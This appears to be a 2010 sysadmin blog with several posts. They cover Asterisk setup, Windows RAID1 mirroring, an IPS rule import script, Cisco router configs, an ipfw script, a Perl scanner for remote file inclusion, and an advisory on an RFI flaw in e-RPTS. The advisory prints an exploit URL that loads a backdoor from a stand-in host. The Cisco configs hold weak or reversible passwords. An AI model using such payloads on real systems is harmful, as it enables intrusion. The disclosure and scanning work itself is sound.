Ubuntu 9.10 + Asterisk + Asterisk-GUI Installation
2/25/2010 11:22:00 AM
Posted by johnhomer
Software used:
- Ubuntu 9.10 Karmic
- Asterisk 1.4.30-rc2
- libpri 1.4.10.2
- dahdi drivers/tools 2.2.1
- asterisk-gui 2.0
I settled for a 1.4 asterisk instead of 1.6 because I was having issues making asterisk-gui work with asterisk.
Now for the steps:
1. Install necessary prerequisites
sudo apt-get install linux-headers-$(uname -r) build-essential autoconf automake autotools-dev bison flex libncurses5-dev libssl-dev libtool subversion svn-buildpackage libxml2-dev
and create working folder
sudo mkdir /usr/src/asterisk
cd /usr/src/asterisk
2. Download necessary files
sudo wget http://downloads.asterisk.org/pub/telephony/asterisk/asterisk-1.4.30-rc2.tar.gz
sudo wget http://downloads.asterisk.org/pub/telephony/libpri/releases/libpri-1.4.10.2.tar.gz
sudo wget http://downloads.asterisk.org/pub/telephony/dahdi-linux-complete/releases/dahdi-linux-complete-2.2.1+2.2.1.tar.gz
sudo svn co http://svn.digium.com/svn/asterisk-gui/branches/2.0 asterisk-gui
3. Unpack the packages
sudo tar -xvf asterisk-1.4.30-rc2.tar.gz
sudo tar -xvf libpri-1.4.10.2.tar.gz
sudo tar -xvf dahdi-linux-complete-2.2.1+2.2.1.tar.gz
4. Install libpri
cd libpri-1.4.10.2
sudo make clean
sudo make
sudo make install
5. Install dahdi-linux
cd ..
cd dahdi-linux-complete-2.2.1+2.2.1
sudo make
sudo make install
6. Asterisk
cd ..
cd asterisk-1.4.30-rc2
sudo make clean
sudo ./configure
sudo make install
sudo make samples
sudo make config
7. Now for the web interface, Asterisk-GUI
cd ../asterisk-gui
sudo make clean
sudo ./configure
sudo make
sudo make install
8. Before you can finally use the web interface, you need to make some minor configuration changes.
sudo vim /etc/asterisk/http.conf
and make the following changes:
[general]
enabled=yes
enablestatic=yes
bindaddr=0.0.0.0 ; or your server's IP address
bindport=8088
9. Add the manager account
sudo vi /etc/asterisk/manager.conf
and make the following changes
[general]
enabled = yes
webenabled = yes
port = 5038
bindaddr = 0.0.0.0 ; or your server's IP address
at the bottom of the file, add the following config:
[admin]
secret = yourpassword
read = system,call,log,verbose,command,agent,user,config
write = system,call,log,verbose,command,agent,config
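A quick check for the exposure steps 8 and 9 create (the manager interface bound to every address, and an account with no address ACL and a placeholder secret), as an added example that is not part of the original post. The function names are hypothetical, the sample configs are constructed, and the 192.168.1.0 management subnet is an assumption; deny and permit are the per-account ACL options shown in Asterisk's sample manager.conf.

```shell
#!/bin/sh
# Added example, not from the original post. audit_manager_conf is a
# hypothetical helper: it reads a manager.conf on stdin, prints one finding
# per line and returns 1 if anything was flagged.
audit_manager_conf() {
    awk '
    function flush_account() {
        if (sect == "" || sect == "general") return
        if (!has_permit) print "NO_ACL " sect
        if (secret == "" || secret == "yourpassword") print "WEAK_SECRET " sect
    }
    { sub(/;.*/, ""); gsub(/^[ \t]+|[ \t]+$/, "") }   # drop comments, trim
    /^\[/ {                                           # a new section starts
        flush_account()
        sect = $0; sub(/^\[/, "", sect); sub(/\].*/, "", sect)
        has_permit = 0; secret = ""
        next
    }
    /=/ {
        key = $0; sub(/[ \t]*=.*/, "", key)
        val = $0; sub(/^[^=]*=[ \t]*/, "", val)
        if (sect == "general" && key == "bindaddr" && val == "0.0.0.0")
            print "WILDCARD_BIND general"
        if (key == "permit") has_permit = 1
        if (key == "secret") secret = val
    }
    END { flush_account() }
    ' | {
        flagged=0
        while read -r finding; do echo "$finding"; flagged=1; done
        [ "$flagged" -eq 0 ]
    }
}

# Constructed input: the [general] and [admin] settings from steps 8 and 9.
weak_conf() {
    printf '%s\n' '[general]' 'enabled = yes' 'webenabled = yes' 'port = 5038' \
        'bindaddr = 0.0.0.0' '[admin]' 'secret = yourpassword' \
        'read = system,call,log,verbose,command,agent,user,config' \
        'write = system,call,log,verbose,command,agent,config'
}
# Constructed corrected version: loopback bind, real secret, per-account ACL
# limited to an assumed management subnet.
fixed_conf() {
    printf '%s\n' '[general]' 'enabled = yes' 'webenabled = yes' 'port = 5038' \
        'bindaddr = 127.0.0.1' '[admin]' 'secret = Constructed-Example-7fQ2' \
        'deny = 0.0.0.0/0.0.0.0' 'permit = 192.168.1.0/255.255.255.0' \
        'read = system,call,log,verbose,command,agent,user,config' \
        'write = system,call,log,verbose,command,agent,config'
}

weak_conf | audit_manager_conf || true
fixed_conf | audit_manager_conf && echo "no findings"
```

On a real system, run it as `audit_manager_conf < /etc/asterisk/manager.conf`.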
Windows 2003 RAID1 mini HOW TO (recovering from a failed drive) - Part 2
2/22/2010 11:12:00 AM
Posted by johnhomer
Recovering from a failed drive is simple. You just have to remove the mirror and add a mirror to the new drive.
Recovering from a failed secondary drive
1. In Disk Management, right click your first partition and choose Remove Mirror...
2. Do the same to other partitions.
3. Now, with the new drive in place, build the new mirror as described in the first part of this how to.
Recovering from a failed primary drive
You need to get your hands dirty a bit.
1. Open up your server's casing and remove the failed drive (primary disk)
2. Move the second drive to the first SATA/IDE port (where the primary drive was previously connected)
3. Start up the server, boot normally. Disk Management will look something like this:
Notice the Missing status on the mirror drive. We removed the mirror and moved it to become the primary drive. Thus, the missing status.
4. Right click on the first partition in Disk 0 and choose Remove Mirror...
Do the same to other partitions.
5. The following prompt may appear because the mirror drive is missing. It is safe to just click OK.
6. Disk Management should look something like this.
7. You can now proceed to Adding a mirror as described in the first part of this how to.
Windows 2003 RAID1 mini HOW TO - Part 1
2/19/2010 09:50:00 AM
Posted by johnhomer
This step-by-step article describes how to mirror the system and boot partition in Windows Server 2003. This scenario is based on the assumption that the system and boot files are located on disk 0 and that disk 1 is unallocated space.
First some definition:
RAID 1 mirroring is an arrangement of hard disks that creates an exact copy (or mirror) of a set of data on two or more disks. This is useful when read performance or reliability are more important than data storage capacity.
Requirements:
- At least two hard-disk drives; IDE, small computer system interface (SCSI), or mixed architecture is permissible.
- The second drive must be at least the size of the volume on which the operating system boot and system files reside to permit mirroring.
- The Windows Server 2003 system and boot files must reside on the same volume to be mirrored.
Objective:
- To add a mirror to the primary drive for redundancy so that when either of the drives fails, quick recovery can be done.
There are two parts in this process -- Converting your Disks to Dynamic Disks and Adding the Actual Mirror.
Converting to Dynamic Disks
Steps:
1. Right click on My Computer on your desktop and click Manage. Under Storage, click Disk Management.
2. Right click on Disk0 and choose Convert to Dynamic Disk...
3. Tick Disk0 and Disk1 and click OK.
4. Review the disks to be converted, click Convert to proceed.
5. The next menu is a warning that other operating systems installed on any volumes on any disks can no longer start. Make sure that you are not dual booting other operating systems. Click Yes to proceed.
6. Now for the final confirmation. Click Yes to proceed.
7. Click OK when prompted. This will restart your server.
8. At this point, new drivers were installed to support the dynamic disks. You will now be prompted to restart - AGAIN.
9. That completes the process of converting to dynamic disks. You can now proceed to adding actual mirror.
Adding the Mirror
On my primary drive, I have pre-set up two partitions: one for the operating system and program files and another for my data. We are going to mirror both.
1. Go to Disk Management as described in the previous process.
2. Right click on the first partition and click Add Mirror...
3. Select the second drive (Disk 1), then click Add Mirror.
4. The partition will now sync to the second drive. Notice that the mirrored partition will now be color coded. It will look something like this.
5. Repeat the same step to the second partition.
When the syncing process is done, you have a RAID 1 system, which means you have 1 parity. Your data is safe even if 1 drive fails.
Part 2 of this mini HOW TO will discuss how to recover from a failed drive.
Untangle UTM IPS Update Script
2/17/2010 09:30:00 AM
Posted by johnhomer
This script generates an .sql file from emergingthreats.net, ready for loading into the Untangle Postgres database. The script may not be needed, since Untangle will auto-update itself, but for those who want to be cutting-edge, this script is for you. You will have to manually update the table with:
psql -e -f newrules.sql uvm postgres
Now for the script:
#! /bin/bash
# John Homer H Alvero
# Feb 13, 2010

# Change to working directory
cd /root/emergingthreats || exit 1

RULEFILE='emerging-all.rules'
LIVE="t"
LOGGING="t"

/usr/bin/wget http://www.emergingthreats.net/version.txt
if [ "$?" -ne "0" ]; then
    # failed download - abort run
    exit 1
fi

# First run: no previous version recorded yet
[ -f oldversion.txt ] || echo 0 > oldversion.txt

exec < version.txt
read CURRENTVERSION
echo "$CURRENTVERSION"

exec < oldversion.txt
read OLDVERSION
echo "$OLDVERSION"

if [ "${CURRENTVERSION}" -eq "${OLDVERSION}" ]; then
    echo "same release available - checking next for updates to exceptions"
    rm -f version.txt*
else
    echo "new version available"
    rm -f $RULEFILE
    /usr/bin/wget http://www.emergingthreats.net/rules/$RULEFILE
    if [ "$?" -ne "0" ]; then
        echo "failed retrieve of new files - exiting"
        exit 3
    fi
    mv version.txt oldversion.txt
    rm -f version.txt*

    # Process file now
    echo "delete from n_ips_rule where Category = 'EmergingThreat';">newrules.sql

    # Collect the numeric settings_id values (one per rack)
    RACK=( )
    DATA=`psql -c "SELECT settings_id from n_ips_settings;" uvm postgres`
    for d in $DATA
    do
        if [ -z "$(echo "$d" |\
            sed 's/[0-9]//g;s/[0-9]//g;s/\.//' \
            )" ] ; then
            RACK=`echo " $RACK $d" `
        fi
    done

    CUSTOMSID=50000
    exec <$RULEFILE
    while read RULES
    do
        CHAR1=`echo "$RULES"|awk '{print substr($0,1,1)}'`
        WORD1=`echo "$RULES"|awk '{print $1}'`
        if [ "$CHAR1" = "#" ]; then
            # Comment line: becomes the description of the rules that follow
            # (single quotes are stripped so the SQL literal stays intact)
            DESCRIPTION=`echo "$RULES"|awk '{gsub(/\047/,"");print substr($0,1,60)}'`
        elif [ "$WORD1" = "alert" ]; then
            RULE=`echo -e "$RULES"|awk '{sub(/alert /,"");gsub(/\047/,"");print}'`
            SID=`echo "$RULES"|awk '{FS=";";;print $(NF-1)}'|awk '{sub(/sid:/,"");sub(/;/,"");print $0}'`
            NAME="Name"
            CATEGORY="EmergingThreat"
            ALERT="f"
            SETTINGSID=$CURRENTVERSION
            # One INSERT per rack for every rule
            for r in $RACK
            do
                echo -e "INSERT INTO n_ips_rule (rule_id, rule, sid, name, category, description, live, alert, log, settings_id)" \
                " VALUES ( $CUSTOMSID, \047$RULE\047, $SID , \047$NAME\047, \047$CATEGORY\047," \
                " \047$DESCRIPTION\047, \047$LIVE\047, \047$ALERT\047, \047$LOGGING\047, \047" \
                "$r\047);" >>newrules.sql
                CUSTOMSID=$(($CUSTOMSID+1))
            done
        fi
    done
fi
echo "Done generating SQL"
echo "Load SQL with
psql -e -f newrules.sql uvm postgres"
e-RPTS RFI Vulnerability
2/12/2010 05:21:00 PM
Posted by johnhomer
About E-RPTS
(from the website)
An Open Source solution for Real Property Taxation in the Philippines
Part of the eLGU-eGOV set of packages developed by NCC for Local Government Units (LGU), e.g. municipalities. Other eLGU packages are eBPLS (Business Permits & Licensing) and eTOMS (Treasury Operations Management).
eRPTS is a web- and GIS-ready application that maintains a database of properties and owners for LGUs that is consistent with the Provincial & National government standards. It also generates reports that allow LGUs to improve their monitoring of compliance and revenue generation.
This is a critical vulnerability since the software is being implemented in each of the Philippine government's Local Government Units and could expose sensitive data such as tax records and other business-related details.
The vulnerability
In the file /includes/web/prepend.php, lines 20-30:
require($_PHPLIB["libdir"] . "common.inc");
require($_PHPLIB["libdir"] . "constants.php");
require($_PHPLIB["libdir"] . "setup.inc");
require($_PHPLIB["libdir"] . "session.inc");
require($_PHPLIB["libdir"] . "auth.inc");
require($_PHPLIB["libdir"] . "perm.inc");
require($_PHPLIB["libdir"] . "db_mysql.inc");
require($_PHPLIB["libdir"] . "tr_rpts.inc");
require($_PHPLIB["libdir"] . "ct_split_mysql.inc");
require($_PHPLIB["libdir"] . "page.inc");
require($_PHPLIB["libdir"] . "template.inc");
This code is vulnerable to Remote File Inclusion through a request such as:
http://victim.com/nccweb/index.php?_PHPLIB[libdir]=http://path.to.phpbackdoor.txt?
For this vulnerability to work, register_globals must be set to On and allow_url_fopen must be set to On.
Recommendations
You should disable allow_url_fopen in the php.ini file:
allow_url_fopen = Off
The setting can also be disabled in Apache's httpd.conf file:
php_admin_flag allow_url_fopen off
This is actually an old PHPLIB vulnerability found here [1]. Unfortunately, developers of E-RPTS failed to update to the latest PHPLIB version.
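To verify a server against the two preconditions named above, here is a php.ini check, added as an example that is not part of the original post. The function names are hypothetical, the demo php.ini is constructed, and the fallback defaults (register_globals off, allow_url_fopen on when a directive is absent) are stated as assumptions in the code.

```shell
#!/bin/sh
# Added example, not from the original post. Function names are hypothetical.
# ini_bool FILE DIRECTIVE -> prints on/off/unset for the last uncommented
# assignment of DIRECTIVE (later lines in php.ini override earlier ones;
# directive names are case-sensitive, values are not).
ini_bool() {
    awk -v want="$2" '
    { sub(/;.*/, "") }                                  # php.ini comments
    {
        line = $0; gsub(/[ \t\r"\047]/, "", line)       # drop blanks and quotes
        n = index(line, "=")
        if (n == 0 || substr(line, 1, n - 1) != want) next
        v = tolower(substr(line, n + 1))
        state = (v == "on" || v == "1" || v == "true" || v == "yes") ? "on" : "off"
    }
    END { print (state == "" ? "unset" : state) }
    ' "$1"
}

# rfi_exposure FILE -> "exposed" when both preconditions named in the post
# hold, otherwise "blocked". Assumed PHP built-in defaults when a directive
# is absent: register_globals=off, allow_url_fopen=on.
rfi_exposure() {
    rg=$(ini_bool "$1" register_globals); [ "$rg" = unset ] && rg=off
    uf=$(ini_bool "$1" allow_url_fopen);  [ "$uf" = unset ] && uf=on
    echo "register_globals=$rg allow_url_fopen=$uf" >&2
    if [ "$rg" = on ] && [ "$uf" = on ]; then echo exposed; else echo blocked; fi
}

# Demo on a constructed php.ini with both settings enabled.
demo_ini=$(mktemp)
printf '%s\n' '[PHP]' 'register_globals = On' 'allow_url_fopen = On' > "$demo_ini"
rfi_exposure "$demo_ini"
rm -f "$demo_ini"
```

Point `rfi_exposure` at the php.ini actually loaded by the web server; the CLI and the Apache module often read different files.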
__________________
Bug Discovered by:
John Homer Alvero
__________________
References:
Cisco Router Provider / Subscriber Configuration
2/06/2010 09:05:00 AM
Posted by johnhomer
Configuration sample for Cisco networking. One end is the provider and another end is a subscriber. The provider's end is using a Cisco 2651XM while the subscriber's end is using a Cisco 805 router.
First, configuration of the provider's side:
Current configuration : 3467 bytes
!
version 12.2
service timestamps debug uptime
service timestamps log uptime
service password-encryption
!
hostname CiscoHost
!
!
enable secret 5 $1$JGXe$Y2vHtRP89namalZbyeMG./
enable password 7 104D010A0618
!
username root password 7 0449030F15400D1A5A
ip subnet-zero
!
!
no ip domain-lookup
ip name-server 8.8.8.8
ip name-server 8.8.4.4
!
!
interface FastEthernet0/0
 description connected to EthernetLAN
 ip address x.x.x.197 255.255.255.192
 duplex auto
 speed auto
!
interface Serial0/0
 no ip address
 encapsulation frame-relay IETF
 frame-relay lmi-type ansi
!
interface Serial0/0.200 point-to-point
 description Link to upstream provider
 bandwidth 2048
 ip address x.x.x.2 255.255.255.252
 frame-relay interface-dlci 200 IETF
!
interface Serial0/0.201 point-to-point
 description frame-relay to Site1
 ip address 10.1.10.9 255.255.255.252
 frame-relay interface-dlci 201 IETF
!
interface Serial0/0.205 point-to-point
 description frame-relay to Site2
 ip address 10.1.10.25 255.255.255.252
 frame-relay interface-dlci 205 IETF
!
interface FastEthernet0/1
 no ip address
 shutdown
!
interface Serial0/1
 no ip address
 description This interface is for another carrier's backhaul
 encapsulation frame-relay IETF
 frame-relay lmi-type ansi
!
interface Serial0/1.25 point-to-point
 description frame-relay link to Site3
 ip address 10.1.10.13 255.255.255.252
 frame-relay interface-dlci 25 IETF
!
interface Serial0/1.30 point-to-point
 description frame-relay link to Site4
 ip address 10.1.10.33 255.255.255.252
 frame-relay interface-dlci 30 IETF
!
ip classless
ip route 0.0.0.0 0.0.0.0 202.78.109.1
ip route x.x.x.224 255.255.255.248 10.1.10.6
ip route x.x.x.232 255.255.255.248 10.1.10.10
ip route x.x.x.240 255.255.255.248 10.1.10.14
ip route x.x.x.248 255.255.255.248 10.1.10.18
ip route x.x.x.0 255.255.255.248 10.1.10.22
ip route x.x.x.8 255.255.255.248 10.1.10.30
ip route x.x.x.16 255.255.255.248 10.1.10.26
ip route x.x.x.24 255.255.255.248 10.1.10.34
no ip http server
ip pim bidir-enable
!
!
line con 0
 exec-timeout 0 0
 password 7 1511021A0725
line aux 0
line vty 0 4
 exec-timeout 0 0
 password 7 02050D300809
 login authentication local
!
!
end
Now for the subscriber's configuration:
Using 1540 out of 32762 bytes
!
version 11.2
no service password-encryption
service udp-small-servers
service tcp-small-servers
!
hostname Site1
!
enable secret 5 $1$38vT$uCzNqai0a69mBYhyadqnS/
enable password secretpassword
!
!
interface Ethernet0
 ip address x.x.x.17 255.255.255.248
 no ip route-cache
 no ip mroute-cache
!
interface Serial0
 no ip address
 encapsulation frame-relay IETF
 frame-relay lmi-type ansi
!
interface Serial0.100 point-to-point
 description frame-relay link to Upstream provider
 ip address 10.1.10.10 255.255.255.252
 frame-relay interface-dlci 200 IETF
!
interface Serial1
 shutdown
!
no ip classless
ip route 0.0.0.0 0.0.0.0 10.1.10.9
!
line con 0
 exec-timeout 2 0
 password secretpassword
 login
line aux 0
 password secretpassword
 login
 transport input all
line vty 0 4
 password secretpassword
 login
!
end
Note that your frame-relay provider will be the one to assign the DLCI. Take note of the DLCI, as it is an important key in the configuration. This should serve ONLY as a guide. Make the necessary changes based on your requirements.
FreeBSD PF Script
2/05/2010 08:50:00 AM
Posted by johnhomer
Sample pf script for FreeBSD. This is what I used and it worked for me. YMMV
#! /bin/sh
/sbin/ipfw -f flush

# Block an IP address from connecting to external hosts/servers
/sbin/ipfw add deny tcp from 192.168.1.57 to any

# Redirect all http traffic to a local proxy server
/sbin/ipfw add fwd [ip.address.of.proxy],3128 tcp from any to any 80

# IPNAT
/sbin/ipfw add divert natd all from any to any via dc0

# Some traffic shaping
/sbin/ipfw add pipe 2 ip from any to 192.168.1.101
/sbin/ipfw pipe 2 config bw 33Kbit/s
/sbin/ipfw add pipe 3 ip from any to 192.168.1.102
/sbin/ipfw pipe 3 config bw 512Kbit/s

/sbin/ipfw add pass all from any to any
WiFiCalc
2/03/2010 04:39:00 PM
Posted by johnhomer
WiFi Calc is a link budget calculator. It will enable you to determine the correct antenna gain, radio power and distance for a point-to-point wireless link.
Usage is straightforward. Just input the antenna gain, radio power in dB, and distance in km, and it will compute the signal for each end of the link.
The required signal on each end of the link depends on the receive sensitivity (for a required link speed) of the radio equipment you are using. This information can be found on your radio equipment's datasheet.
RFIScan - a Remote File Include Vulnerability Scanner
2/02/2010 02:52:00 PM
Posted by johnhomer
I wrote a Perl script to find RFI vulnerabilities in PHP scripts. It takes a folder name as a parameter. The script will scan the specified folder and its sub-folders recursively.
usage: ./scan /var/www/html/
#!/usr/bin/perl
#
# PHP RFI Vulnerability Scanner
# John Homer H Alvero
# Feb. 1, 2010
use strict;
use warnings;

die "usage: $0 <folder>\n" unless @ARGV;

my $txt_folder = $ARGV[0] . '/';
# 1 = ignore includes whose variable is assigned earlier in the same file
my $check_declarations = 1;
my $found = 0;

check_folders($txt_folder);

if ($found) {
    print "RFI Vulnerability Found!\n";
} else {
    print "No vulnerability found\n";
}

# SUB(s)
sub check_folders {
    my ($dir) = @_;
    my @fileVars = ();

    opendir(my $folder, $dir) or die "cannot open $dir";
    print "opening folder $dir \n";
    my @subfiles = readdir($folder);
    closedir($folder);

    foreach my $file (@subfiles) {
        my $specfile = $dir . $file;
        if (-f $specfile && $file =~ m/\S+\.php/) {
            open(my $fh, "<", $specfile) or die $!;
            my $line_ctr = 0;
            print "in file $specfile\n";
            while (my $line = <$fh>) {
                $line_ctr++;
                # include/require whose argument starts with a variable
                if (my ($var) = $line =~ m/^\s*(?:include_once|include|require_once|require)\s*\(?\s*(\$\w+)/) {
                    # report unless that variable was assigned earlier in this file
                    if (!$check_declarations || !grep { $_ eq $var } @fileVars) {
                        print "Line No: $line_ctr $line";
                        $found = 1;
                    }
                }
                # remember variables assigned at the start of a line
                if ($line =~ m/^\s*\$\S*\s*=\s*/) {
                    my ($lineVar) = $line =~ m/^\s*(\$\w+)/;
                    push(@fileVars, $lineVar) if defined $lineVar;
                }
            }
            close($fh);
            @fileVars = ();
        } elsif (-d $specfile) {
            # skip the "." and ".." entries, recurse into everything else
            if ($file ne '.' && $file ne '..') {
                check_folders($specfile . "/");
            }
        }
    }
}